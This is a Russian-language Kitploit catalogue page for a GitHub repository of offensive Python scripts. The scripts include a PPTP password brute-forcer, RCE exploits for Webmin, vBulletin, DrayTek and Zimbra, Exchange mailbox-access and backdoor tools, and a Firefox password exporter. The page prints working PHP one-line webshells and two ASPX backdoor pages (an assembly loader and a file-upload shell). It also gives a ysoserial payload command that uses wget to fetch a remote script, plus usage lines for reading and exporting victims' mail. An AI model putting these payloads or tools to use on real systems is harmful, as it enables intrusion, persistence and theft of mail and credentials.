Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Homework-of-Python — Python codes of my blog. | Kitploit
Инструменты/GitHubGitHub/3gstudent/homework-of-python
Vulnerability ScannersPassword AttacksExploitationWeb Application ExploitationInformation GatheringPost-ExploitationRed TeamingPayload Development
GitHub3gstudent/homework-of-python

Homework-of-Python

Python codes of my blog.

Репозиторий
4121263 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Homework-of-Python

Python-коды из моего блога.

pptp_password_hack.py

Использует атаку brute-force для получения пароля PPTP VPN.

Считывает пароли из файла (с именем wordlist), а затем использует pptpsetup для подключения к серверу.

Интервал времени — 10 секунд.


portscan.py

Используется для сканирования портов.

Таймаут — 3 секунды.

Версия на c++:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Используется для получения IP-адреса из URL.

Можно напрямую использовать результат Sublist3r.

file_deduplication(For_urltoip).py

Используется для удаления дублирующихся IP-адресов из результата Sublist3r.

Можно напрямую использовать результат urltoip.py.

IP-адреса можно отсортировать с помощью Sublime (F9).


file_deduplication.py

Используется для удаления дублирующихся элементов из файла.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Ссылка:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Используется для вызова API fofa и вывода IP-адресов из результатов.

Можно получить 100 результатов.

fofa_api_VIP.py

Используется для вызова API fofa и вывода IP-адресов из результатов.

Если вы VIP, вы получите 10000 результатов.


vBulletin_5.x_0day_pre-auth_RCE.py

Ссылка:

https://seclists.org/fulldisclosure/2019/Sep/31

Пример:

root@kitploit:~
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Ссылка:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Пример:

root@kitploit:~
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Используется для экспорта пароля из Firefox

get_Exchange_version.py

Используется для получения версии Exchange.

Сначала получает BuildNumber из исходного кода URL, а затем определяет версию.

Ссылка:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Используется для сканирования уязвимости SMBv3 RCE.

Таймаут — 3 секунды.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Ссылка:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

Устройства DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta и Vigor300B 1.3.3_Beta, 1.4.2.1_Beta и 1.4.4_Beta позволяют удалённо выполнять код с правами root (без аутентификации) через shell-метасимволы в URI cgi-bin/mainfunction.cgi.

Затронутые продукты:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Использует Zimbra SOAP API для подключения к почтовому серверу Zimbra.

Использование:

root@kitploit:~
      Zimbra_SOAP_API.py <url> <username> <password> <mode>

Режим:

  • low аутентификация для low-токена
  • admin аутентификация для admin-токена
  • ssrf Использует CVE-2019-9621 для получения admin-токена

Пример:

root@kitploit:~
      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Используется для проверки действительности учётной записи Exchange Web Service (поддерживает plaintext и ntlmhash)

Ссылка: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Использование:

root@kitploit:~
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Пример:

root@kitploit:~
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Используется для доступа к Autodiscover.xml и получения конфигурации пользователя (поддерживает plaintext и ntlmhash)

Использование:

root@kitploit:~
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Пример:

root@kitploit:~
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

Дополнительный режим checkAutodiscover.py

Добавляет параметр

ewsManage.py

Используется для доступа к Exchange Web Service (поддерживает plaintext и ntlmhash)

Использование:

root@kitploit:~
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Пример:

root@kitploit:~
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Используется для проверки действительности учётных данных SSH (поддерживает пароль и файл приватного ключа)

Использование:

root@kitploit:~
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Пример:

root@kitploit:~
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

Удалённое выполнение команд через SSH (поддерживает пароль и файл приватного ключа)

Использование:

root@kitploit:~
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Пример:

root@kitploit:~
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Используется для проверки действительности учётных данных eas (Exchange Server ActiveSync)

Использование:

root@kitploit:~
easCheck.py <host> <user> <password>

Пример:

root@kitploit:~
easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Используется для проверки действительности учётной записи Exchange через подключение к OWA.

Использование:

root@kitploit:~
checkOWA.py <url> <user> <password>

owaManage.py

Используется для чтения писем через подключение к OWA.

Использование:

root@kitploit:~
owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Использует IMAP для подключения к почтовому серверу.

Использование:

root@kitploit:~
imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Используется для реализации NTLM-аутентификации и взаимодействия с execCmd.aspx

Данные взаимодействия кодируются с помощью Base64

Использование:

root@kitploit:~
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

Версия на C#: SharpExchangeBackdoor.cs

Используется для отправки полезной нагрузки в бэкдор веб-шелла Exchange.

Поддерживает:

  • assemblyLoad
  • webshellWrite

Использование:

root@kitploit:~
    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

пример:

root@kitploit:~
    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

Zimbra_deserialization_RCE(CVE-2019-6980).py

Небезопасная десериализация объектов — IMAP

Использование:

root@kitploit:~
<url> <user> <password> <payload path>

Пример:

root@kitploit:~
https://192.168.1.1 [email protected] password1 payload.obj

Примечание:

Вы можете сгенерировать payload.obj следующим образом:

java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj


ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

ExchangeDeserializeShell-NoAuth-ghostfile.py

Используются для тестирования выполнения кода через десериализацию в Exchange.
От прав на чтение и запись файлов Exchange до выполнения кода через десериализацию. Необходимо изменить machineKey в %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config для реализации выполнения кода через десериализацию. <path>: owa или ecp

Использование:

root@kitploit:~
    <url> <key> <path>

пример:

root@kitploit:~
 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
 mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

Exchange_EWS_XML_Parser.py

Используется для разбора SOAP XML-сообщений Exchange.


eacManage.py

Используется для доступа к центру администрирования Exchange

Использование:

root@kitploit:~
eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox          
- GetCertificate 
- ExportCertificate          
          

vSphereAutomationAPI_Manage.py

Использует vSphere Automation API (v7.0U1+) для управления VM

Поддерживает Windows и Linux VM

vSphereWebServicesAPI_Manage.py

Использует vSphere Web Services API для управления VM

Ссылка: https://github.com/vmware/pyvmomi/

Установка: pip install --upgrade pyvmomi

vCenterLDAP_Manage.py

Используется для управления базой данных LDAP на vCenter.


SolarWindsOrion_Manage.py

Используется для управления платформой SolarWinds Orion

SolarWindsOrionAPI_Manage.py

Использует SolarWinds Orion API для управления платформой Orion


MailEnableManage.py

Используется для управления почтовым сервером MailEnable


blind_XXEPlatform_CVE-2019-9670.py

Поддерживает получение результатов через протокол HTTP или FTP.


ewsManage_Downloader.py

Используется для доступа к Exchange Web Service (поддерживает plaintext и ntlmhash)

ewsManage_exchangelib_Downloader.py

Используется для доступа к Exchange Web Service (поддерживает plaintext и ntlmhash)

ewsManage_requests_ntlm_Downloader.py

Использует requests_ntlm2 для доступа к Exchange Web Service (поддерживает plaintext и ntlmhash)

ewsManage_requests_ntlm_Session_Downloader.py

Использует requests_ntlm2 для доступа к Exchange Web Service (поддерживает plaintext и ntlmhash)

Использует session для уменьшения объёма передаваемых данных


vCenter_ExtraCertFromMdb.py

Изменено на основе https://github.com/horizon3ai/vcenter_saml_login

vCenter_GenerateLoginCookie.py

Изменено на основе https://github.com/horizon3ai/vcenter_saml_login


Exchange_GetVersion_MatchVul.py

Используется для получения версии Exchange и сопоставления с существующими уязвимостями

Exchange_GetVersion_ParseFromFile.py

Используется для получения версии Exchange и разбора версии из https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019

Необходимо сохранить https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 как exchange.data

Exchange_GetVersion_ParseFromWebsite.py

Используется для получения версии Exchange и разбора версии из https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019


Exchange_GetInternalIP.py

Используется для получения внутреннего IP-адреса Exchange

Основано на msf auxiliary/scanner/http/owa_iis_internal_ip, но поддерживает больше серверов Exchange.


vRealizeOperationsManager_GetVersion.py

Используется для получения версии vRealize Operations Manager


BIG-IP_RunBash.py

Использует bash для выполнения команд


SophosUTM_plxDecrypter.py

Используется для расшифровки .plx-файлов Sophos UTM

Ссылка:

https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/the6p4c/bfs_extract

SophosUTM_ConfigParser.py

Используется для разбора конфигурации Sophos UTM


Скачать инструмент